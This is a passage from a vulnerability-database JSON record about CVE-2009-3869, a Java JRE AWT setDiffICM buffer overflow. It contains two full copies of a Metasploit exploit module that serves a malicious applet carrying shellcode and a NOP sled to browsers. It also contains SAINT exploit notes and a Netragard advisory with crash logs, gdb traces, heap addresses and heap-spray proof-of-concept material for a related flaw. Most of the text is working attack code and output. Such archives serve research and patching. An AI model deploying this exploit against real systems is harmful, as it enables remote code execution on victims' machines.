"http://download.saintcorporation.com/cgi-bin/exploit_info/jre_awt_setdifficm", "id": "SAINT:53B1A46D390ABCB591CC24072217E221", "type": "saint", "title": "Java Runtime Environment AWT setDiffICM buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "description": "Added: 11/27/2009 \nCVE: [CVE-2009-3869](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869>) \nBID: [36881](<http://www.securityfocus.com/bid/36881>) \nOSVDB: [59710](<http://www.osvdb.org/59710>) \n\n\n### Background\n\nJava Runtime Environment (JRE) allows end users to run Java applications. \n\n### Problem\n\nA buffer overflow vulnerability in the setDiffICM function of the Abstract Window Toolkit (AWT) allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Sun article 270474](<http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-078/> \n\n\n### Limitations\n\nExploit works on Java Runtime Environment 6 Update 16 and requires a user to open the exploit page in Firefox 2.0.x. \n\nIn order for the exploit to succeed, the security policy in JRE must allow access to classes in the sun.awt.image package. To configure JRE to allow access to classes in the sun.awt.image package, add the following lines to the Java policy file on the target system: \n\n> \n> grant {\n> permission java.lang.RuntimePermission\n> \"accessClassInPackage.sun.awt.image\";\n> }\n> \n\n\nThe Java policy file can be found at: \n\n> \n> C:\\Program Files\\Java\\jreX\\lib\\security\\java.policy\n> \n\nwhere X is the JRE series, such as 5 or 6. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2009-11-27T00:00:00", "published": "2009-11-27T00:00:00", "id": "SAINT:FBDAACB18028839834A31F8D448CEA10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/jre_awt_setdifficm", "title": "Java Runtime Environment AWT setDiffICM buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T23:32:36", "description": "Sun Java JRE AWT setDiffICM Buffer Overflow. CVE-2009-3869. Remote exploits for multiple platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Sun Java JRE AWT setDiffICM Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16298", "href": "https://www.exploit-db.com/exploits/16298/", "sourceData": "##\r\n# $Id: java_setdifficm_bof.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a flaw in the setDiffICM function in the Sun JVM.\r\n\r\n\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\r\n\t\t\t\ta native payload.\r\n\r\n\t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\r\n\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\r\n\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\r\n\r\n\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\r\n\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-3869' ],\r\n\t\t\t\t\t[ 'OSVDB', '59710' ],\r\n\t\t\t\t\t[ 'BID', '36881' ],\r\n\t\t\t\t\t[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n=begin\r\n\r\nNo automatic targetting for now ...\r\n\r\n\t\t\t\t\t[ 'J2SE 1.6_16 Automatic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['win', 'linux', 'osx'],\r\n\t\t\t\t\t\t\t'Arch' => [ARCH_X86, ARCH_PPC]\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n=end\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Windows x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Mac OS X PPC',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Mac OS X x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 04 2009'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, req)\r\n\r\n\t\t# Create a cached mapping between IP and detected target\r\n\t\t@targetcache ||= {}\r\n\t\t@targetcache[cli.peerhost] ||= {}\r\n\t\t@targetcache[cli.peerhost][:update] = Time.now.to_i\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tcase req.headers['User-Agent']\r\n\t\t\twhen /Windows/i\r\n\t\t\t\tprint_status(\"Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[1]\r\n\t\t\twhen /PPC Mac OS X/i\r\n\t\t\t\tprint_status(\"Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[2]\r\n\t\t\twhen /Intel Mac OS X/i\r\n\t\t\t\tprint_status(\"Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[3]\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Unknown target for: #{req.headers['User-Agent']}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Clean the cache\r\n\t\trmq = []\r\n\t\t@targetcache.each_key do |addr|\r\n\t\t\tif (Time.now.to_i > @targetcache[addr][:update]+60)\r\n\t\t\t\trmq.push addr\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\trmq.each {|addr| @targetcache.delete(addr) }\r\n\r\n\r\n\t\t# Request processing\r\n\t\tif (not req.uri.match(/\\.jar$/i))\r\n\r\n\t\t\t# Redirect to the base directory so the applet code loads...\r\n\t\t\tif (not req.uri.match(/\\/$/))\r\n\t\t\t\tprint_status(\"Sending redirect so path ends with / ...\")\r\n\t\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\t# Display the applet loading HTML\r\n\t\t\tprint_status(\"Sending HTML to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response_html(cli, generate_html(payload.encoded),\r\n\t\t\t\t{\r\n\t\t\t\t\t'Content-Type' => 'text/html',\r\n\t\t\t\t\t'Pragma' => 'no-cache'\r\n\t\t\t\t})\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Send the actual applet over\r\n\t\tprint_status(\"Sending applet to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response(cli, generate_applet(cli, req),\r\n\t\t\t{\r\n\t\t\t\t'Content-Type' => 'application/octet-stream',\r\n\t\t\t\t'Pragma' => 'no-cache'\r\n\t\t\t})\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef generate_html(pl)\r\n\r\n\t\thtml = <<-EOF\r\n<html>\r\n<head>\r\n<!-- <meta http-equiv=refresh content=10 /> -->\r\n</head>\r\n<body>\r\n<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>\r\n<param name='sc' value='SCODE' />\r\n<param name='np' value='NOPS' />\r\n</applet>\r\n</body>\r\n</html>\r\nEOF\r\n\t\t# finalize html\r\n\t\tjar_name = rand_text_alphanumeric(32)+\".jar\"\r\n\t\thtml.gsub!(/JARNAME/, jar_name)\r\n\r\n\t\t# put payload into html\r\n\t\tdebug_payload = false\r\n\t\tpload = \"\"\r\n\t\tpload << \"\\xcc\" if debug_payload\r\n\t\tpload << pl\r\n\t\tif ((pload.length % 4) > 0)\r\n\t\t\tpload << rand_text((4 - (pload.length % 4)))\r\n\t\tend\r\n\t\tif debug_payload\r\n\t\t\tprint_status(\"pload #{pload.length} bytes:\\n\" + Rex::Text.to_hex_dump(pload))\r\n\t\tend\r\n\t\thtml.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))\r\n\r\n\t\t# put nops into html\r\n\t\tnops = \"\\x90\\x90\\x90\\x90\"\r\n\t\thtml.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))\r\n\t\t#print_status(\"nops #{nops.length} bytes:\\n\" + Rex::Text.to_hex_dump(nops))\r\n\r\n\t\treturn html\r\n\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2009-3869.jar\")\r\n\t\tfd = File.open(path, \"rb\")\r\n\t\t@jar_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef generate_applet(cli, req)\r\n\r\n\t\tthis_target = nil\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tif (@targetcache[cli.peerhost][:target])\r\n\t\t\t\tthis_target = @targetcache[cli.peerhost][:target]\r\n\t\t\telse\r\n\t\t\t\treturn ''\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tthis_target = target\r\n\t\tend\r\n\r\n\t\treturn @jar_data\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16298/"}], "metasploit": [{"lastseen": "2020-10-02T00:40:25", "description": "This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n", "published": "2009-12-17T04:52:40", "type": "metasploit", "title": "Sun Java JRE AWT setDiffICM Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_SETDIFFICM_BOF", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_setdifficm_bof.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:18", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Sun Java JRE AWT setDiffICM Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84533", "href": "https://packetstormsecurity.com/files/84533/Sun-Java-JRE-AWT-setDiffICM-Buffer-Overflow.html", "sourceData": "`## \n# $Id: java_setdifficm_bof.rb 7903 2009-12-17 05:22:40Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow', \n'Description' => %q{ \nThis module exploits a flaw in the setDiffICM function in the Sun JVM. \n \nThe payload is serialized and passed to the applet via PARAM tags. It must be \na native payload. \n \nThe effected Java versions are JDK and JRE 6 Update 16 and earlier, \nJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and \nearlier, and SDK and JRE 1.3.1_26 and earlier. \n \nNOTE: Although all of the above versions are reportedly vulnerable, only \n1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'jduck' \n], \n'Version' => '$Revision: 7903 $', \n'References' => \n[ \n[ 'CVE', '2009-3869' ], \n[ 'OSVDB', '59710' ], \n[ 'BID', '36881' ], \n[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ], \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => '', \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n=begin \n \nNo automatic targetting for now ... \n \n[ 'J2SE 1.6_16 Automatic', \n{ \n'Platform' => ['win', 'linux', 'osx'], \n'Arch' => [ARCH_X86, ARCH_PPC] \n} \n], \n=end \n[ 'J2SE 1.6_16 on Windows x86', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86 \n} \n], \n[ 'J2SE 1.6_16 on Mac OS X PPC', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_PPC, \n} \n], \n[ 'J2SE 1.6_16 on Mac OS X x86', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 04 2009' \n)) \nend \n \n \ndef on_request_uri(cli, req) \n \n# Create a cached mapping between IP and detected target \n@targetcache ||= {} \n@targetcache[cli.peerhost] ||= {} \n@targetcache[cli.peerhost][:update] = Time.now.to_i \n \nif (target.name =~ /Automatic/) \ncase req.headers['User-Agent'] \nwhen /Windows/i \nprint_status(\"Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...\") \n@targetcache[cli.peerhost][:target] = self.targets[1] \nwhen /PPC Mac OS X/i \nprint_status(\"Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...\") \n@targetcache[cli.peerhost][:target] = self.targets[2] \nwhen /Intel Mac OS X/i \nprint_status(\"Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...\") \n@targetcache[cli.peerhost][:target] = self.targets[3] \nelse \nprint_status(\"Unknown target for: #{req.headers['User-Agent']}\") \nend \nend \n \n# Clean the cache \nrmq = [] \n@targetcache.each_key do |addr| \nif (Time.now.to_i > @targetcache[addr][:update]+60) \nrmq.push addr \nend \nend \n \nrmq.each {|addr| @targetcache.delete(addr) } \n \n \n# Request processing \nif (not req.uri.match(/\\.jar$/i)) \n \n# Redirect to the base directory so the applet code loads... \nif (not req.uri.match(/\\/$/)) \nprint_status(\"Sending redirect so path ends with / ...\") \nsend_redirect(cli, get_resource() + '/', '') \nreturn \nend \n \n# Display the applet loading HTML \nprint_status(\"Sending HTML to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response_html(cli, generate_html(payload.encoded), \n{ \n'Content-Type' => 'text/html', \n'Pragma' => 'no-cache' \n}) \nreturn \nend \n \n# Send the actual applet over \nprint_status(\"Sending applet to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response(cli, generate_applet(cli, req), \n{ \n'Content-Type' => 'application/octet-stream', \n'Pragma' => 'no-cache' \n}) \n \n# Handle the payload \nhandler(cli) \nend \n \n \ndef generate_html(pl) \n \nhtml = %Q|<html> \n<head> \n<!-- <meta http-equiv=refresh content=10 /> --> \n</head> \n<body> \n<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'> \n<param name='sc' value='SCODE' /> \n<param name='np' value='NOPS' /> \n</applet> \n</body> \n</html> \n| \n# ugh.. pain \ndebug_payload = false \npload = \"\" \npload << \"\\xcc\" if debug_payload \npload << pl \nif ((pload.length % 4) > 0) \npload << rand_text((4 - (pload.length % 4))) \nend \nif debug_payload \nprint_status(\"pload #{pload.length} bytes:\\n\" + Rex::Text.to_hex_dump(pload)) \nend \nhtml.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) \n \nnops = \"\\x90\\x90\\x90\\x90\" \nhtml.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) \n#print_status(\"nops #{nops.length} bytes:\\n\" + Rex::Text.to_hex_dump(nops)) \n \nreturn html \n \nend \n \n \ndef generate_applet(cli, req) \n \nthis_target = nil \nif (target.name =~ /Automatic/) \nif (@targetcache[cli.peerhost][:target]) \nthis_target = @targetcache[cli.peerhost][:target] \nelse \nreturn '' \nend \nelse \nthis_target = target \nend \n \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2009-3869.jar\") \n \nfd = File.open(path, \"rb\") \ndata = fd.read(fd.stat.size) \nfd.close \n \nreturn data \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84533/java_setdifficm_bof.rb.txt"}, {"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2009-12-30T00:00:00", "type": "packetstorm", "title": "Netragard Security Advisory 2009-12-19", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3728", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3884", "CVE-2009-3868"], "modified": "2009-12-30T00:00:00", "id": "PACKETSTORM:84499", "href": "https://packetstormsecurity.com/files/84499/Netragard-Security-Advisory-2009-12-19.html", "sourceData": "`[Advisory Summary] \n----------------------------------------------------------------------- \nAdvisory Author : Adriel T. Desautels \nResearcher : Kevin Finisterre \nAdvisory ID : NETRAGARD-20091219 \nProduct Name : Mac OS X Java Runtime \nProduct Version : < Java for Mac OS X 10.6 Update 1 \nVendor Name : http://www.apple.com, http://www.sun.com \nType of Vulnerability : Buffer Overflow \nImpact : Arbitrary Code Execution \nVendor Notified : Yes \nPatch Released : http://support.apple.com/kb/HT3969 \nDiscovery Date : 11/13/2009 \n \n[POSTING NOTICE] \n----------------------------------------------------------------------- \nIf you intend to post this advisory on your web-site you must provide \na clickable link back to http://www.netragard.com. The contents of \nthis advisory may be updated without notice. \n \n[Product Description] \n----------------------------------------------------------------------- \nMac OS X is the only major consumer operating system that comes complete \nwith a fully configured and ready-to-use Java runtime and development \nenvironment. Professional Java developers are increasingly turning to \nthe feature-rich Mac OS X as the operating system of choice for both \nMac-based and cross-platform Java development projects. Mac OS X \nincludes \nthe full version of J2SE 1.5, pre-installed with the Java Development \nKit (JDK) and the HotSpot virtual machine (VM), so you don't have to \ndownload, install, or configure anything. \n \nDeploying Java applications on Mac OS X takes advantage of many built-in \nfeatures, including 64-bit support, resolution independence, automatic \nsupport of multiprocessor hardware, native support for the Java \nAccessibility API, and the native Aqua look and feel. As a result, \nJava applications on Mac OS X look and perform like native applications \non Mac OS X. \n \n \n[Technical Summary] \n----------------------------------------------------------------------- \nOn November 4th, 2009 ZDI-09-076 was released and subsequently credited \nto 'Anonymous'. Given the historic track record with regards to lagging \nbehind 3rd party \"coordinated\" disclosures we decided to validate \nwether or not OSX was vulnerable in its current state. More importantly \nwe wanted to validate that the vulnerable classes were reachable via \nstandard web browser. \n \nThe ZDI release contained limited information but that didn't prevent \nus from creating a working Proof of Concept (\"PoC\") for this issue. \n \nAs previously mentioned, the prime reason that we decided to look into \nthis \nvulnerability was because we suspected that it was possible to remotely \ntrigger and exploit the risk via the Safari Web Browser. We were right. \n \nThe easiest way to validate this was to find an example applet that used \nthe getSoundbank() function and then to modify \nit. \n \nA quick glance at the Sun manual page gave us a hint as to how to \nuse the function. \n \nhttp://java.sun.com/j2se/1.3/docs/api/javax/sound/midi/MidiSystem.html#getSoundbank(java.net.URL) \n \npublic static Soundbank getSoundbank(URL url) \nthrows InvalidMidiDataException, IOException \nConstructs a Soundbank by reading it from the specified URL. \nThe URL must point to a valid MIDI soundbank file. \n \nParameters: \nurl - the source of the sound bank data \n \nReturns: \nthe sound bank \n \nThrows: \nInvalidMidiDataException - if the URL does not point to valid MIDI \nsoundbank data recognized by the system \nIOException - if an I/O error occurred when loading the soundbank \n \nWe used a google query to find an example: \nhttp://www.google.com/search?hl=en&source=hp&q=javax.sound.midi+getSoundbank+applet&aq=f&oq=&aqi= \n \nLuckily the example was an applet which eliminates the question of \naccessibility to the vulnerability via applet tag. \n \nhttp://music.columbia.edu/pipermail/jmsl/2004-November/000555.html \n \nIf you modify the above code example we can trigger the bug and get \nand some additional information about it. \n \nAll of the testing below was done with appletviewer and the following \nhtml page, coupled with our compiled proof of concept class. \n \n$ cat index.html \n<title> getSoundBank pwn </title> \n</head><body> \n \n<applet code=\"test.class\" width=\"150\" height=\"25\"> \n</applet> \n \n \n[Technical Details] \n----------------------------------------------------------------------- \nhttp://www.zerodayinitiative.com/advisories/ZDI-09-076/ tells us there \nis a 'vulnerability [that] allows remote attackers to execute arbitrary \ncode on vulnerable installations of Sun Microsystems Java.' \n \nZDI also states that 'The specific flaw exists in the parsing of \nlong file:// URL arguments to the getSoundbank() function.' and that \n'Exploitation of this vulnerability can lead to system compromise under \nthe credentials of the currently logged in user.' \n \nThe code shown below in the Proof of Concept section allows us to \nvalidate \nthe statements made by ZDI by triggering the bug and subsequently \ncrashing \nthe JVM. \n \nWhen the JVM crashes it leaves a log behind in the /Library/Logs/Java \nfolder that provides useful information. \n \n$ ls /Library/Logs/Java/ \nJavaNativeCrash_pid1815.crash.log \n \nOne of the important things recorded to the log is the address of \nthe JVM's heap. Since a heap spray is used to place shellcode at \na usable address this is quite useful. \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n \nJava information: \nVersion: Java HotSpot(TM) Client VM (1.5.0_13-119 mixed mode, sharing) \nVirtual Machine version: Java HotSpot(TM) Client VM (1.5.0_13-119) for \\ \nmacosx-x86, built on Sep 28 2007 23:59:21 by root with gcc 4.0.1 \n(Apple \\ \nInc. build 5465) \n \nException type: Bus Error (0xa) at pc=0x1755c81b \n \nCurrent thread (0x0100e010): JavaThread \"thread applet-test.class\"\\ \n[_thread_in_native, id=9097216] \n \nStack: [0xb0d97000,0xb0e17000) \nJava frames: (J=compiled Java code, j=interpreted, Vv=VM code) \nj com.sun.media.sound.HeadspaceSoundbank.nOpenResource(Ljava/lang/ \nString;)J+0 \nj com.sun.media.sound.HeadspaceSoundbank.initialize(Ljava/lang/ \nString;)V+7 \nj com.sun.media.sound.HeadspaceSoundbank.<init>(Ljava/net/URL;)V+89 \nj com.sun.media.sound.HsbParser.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+5 \nj javax.sound.midi.MidiSystem.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+36 \nj test.init()V+339 \nj sun.applet.AppletPanel.run()V+197 \nj java.lang.Thread.run()V+11 \nv ~StubRoutines::call_stub \nJava Threads: ( => current thread ) \n0x01011980 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9269760] \n0x01011790 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9266176] \n0x01011310 JavaThread \"AWT-EventQueue-1\" [_thread_blocked, \nid=9249792] \n0x01001440 JavaThread \"DestroyJavaVM\" [_thread_blocked, \nid=-1333784576] \n0x0100e210 JavaThread \"AWT-EventQueue-0\" [_thread_blocked, \nid=9107968] \n=>0x0100e010 JavaThread \"thread applet-test.class\" [_thread_in_native, \nid=9097216] \n0x0100cb90 JavaThread \"Java2D Disposer\" daemon [_thread_blocked, \nid=9035264] \n0x0100bda0 JavaThread \"AWT-Shutdown\" [_thread_blocked, id=8834048] \n0x0100b900 JavaThread \"AWT-AppKit\" daemon [_thread_in_native, \nid=-1607766176] \n0x01009050 JavaThread \"Low Memory Detector\" daemon \n[_thread_blocked, id=8411136] \n0x01008580 JavaThread \"CompilerThread0\" daemon [_thread_blocked, \nid=8506880] \n0x01008120 JavaThread \"Signal Dispatcher\" daemon [_thread_blocked, \nid=8503296] \n0x01007810 JavaThread \"Finalizer\" daemon [_thread_blocked, \nid=8483840] \n0x01007570 JavaThread \"Reference Handler\" daemon [_thread_blocked, \nid=8480256] \nOther Threads: \n0x01006cc0 VMThread [id=8476672] \n0x01009c50 WatcherThread [id=8414720] \n \nVM state:not at safepoint (normal execution) \nVM Mutex/Monitor currently owned by a thread: None \n \nHeap \ndef new generation total 4544K, used 3238K [0x25580000, \n0x25a60000, 0x25a60000) \neden space 4096K, 79% used [0x25580000, 0x258a9b30, 0x25980000) \nfrom space 448K, 0% used [0x259f0000, 0x259f0000, 0x25a60000) \nto space 448K, 0% used [0x25980000, 0x25980000, 0x259f0000) \ntenured generation total 60544K, used 60028K [0x25a60000, \n0x29580000, 0x29580000) \nthe space 60544K, 99% used [0x25a60000, 0x294ff048, 0x294ff200, \n0x29580000) \ncompacting perm gen total 8192K, used 1093K [0x29580000, \n0x29d80000, 0x2d580000) \nthe space 8192K, 13% used [0x29580000, 0x29691698, 0x29691800, \n0x29d80000) \nro space 8192K, 63% used [0x2d580000, 0x2da96c48, 0x2da96e00, \n0x2dd80000) \nrw space 12288K, 43% used [0x2dd80000, 0x2e2af088, 0x2e2af200, \n0x2e980000) \n \nVirtual Machine arguments: \nJVM args: -Dapplication.home=/System/Library/Frameworks/ \nJavaVM.framework/Versions/1.5.0/Home \nJava command: sun.applet.Main /Users/hostile/Desktop/index.html \nlauncher type: SUN_STANDARD \n \nNote: The heap within appletviewer is located at '0x25580000' \n \nWhen triggered with Safari the Heap location is slightly different \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n... \nHeap \ndef new generation total 6848K, used 5542K [0x1a270000, \n0x1a9d0000, 0x1a9d0000) \n... \n \nIn that particular trace the Safari Java heap was located at 0x1a270000. \n \nThe PoC provided below instructs appletviewer to land in a nopsled. \nFuther \nresearch will yield a functional exploit. In essence this code sprays \nthe \nheap in order to place attacker controlled code at the proper address \nrange \nwithin the heap. With several stack frames under control it is \npossible to \ncontrol the flow of execution. Control of an eax address is what leads \nto \nfinal code execution. \n \n0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>:\\ \ncall *0x2a8(%eax) \n \n \n[Proof Of Concept] \n----------------------------------------------------------------------- \n \n/* \n \nWe should only need safe shellcode at this point. \n \nInvalid memory access of location 00000000 eip=256823b6 \n \nProgram received signal EXC_BAD_ACCESS, Could not access memory. \nReason: KERN_PROTECTION_FAILURE at address: 0x00000000 \n[Switching to process 561 thread 0x15107] \n0x256823b6 in ?? () \n(gdb) bt \n#0 0x256823b6 in ?? () \n#1 0x188fd821 in \nJava_com_sun_media_sound_HeadspaceSoundbank_nOpenResource () \n#2 0x25582126 in ?? () \nPrevious frame inner to this frame (gdb could not unwind past this \nframe) \n \n(gdb) x/6x 0x256823b6-12 \n0x256823aa: 0x90909090 0x90909090 0x90909090 0x00333031 \n0x256823ba: 0x00330032 0x00010033 \n \nWe only crash because we ran out of code to execute... \n(gdb) x/i $eip \n0x256823b6: xor %esi,(%eax) \n(gdb) i r $esi $eax \nesi 0x0 0 \neax 0x0 0 \n \nnotice that frame 1's eip of 0x188fd821 is AFTER the call to eax at \n0x1891a81b \n \n(gdb) x/10i$eip \n0x1891a803 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+84>: mov (%edx),%eax \n0x1891a805 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+86>: mov 0x10(%ebp),%edx \n0x1891a808 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+89>: mov %edi,0x8(%esp) \n0x1891a80c <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 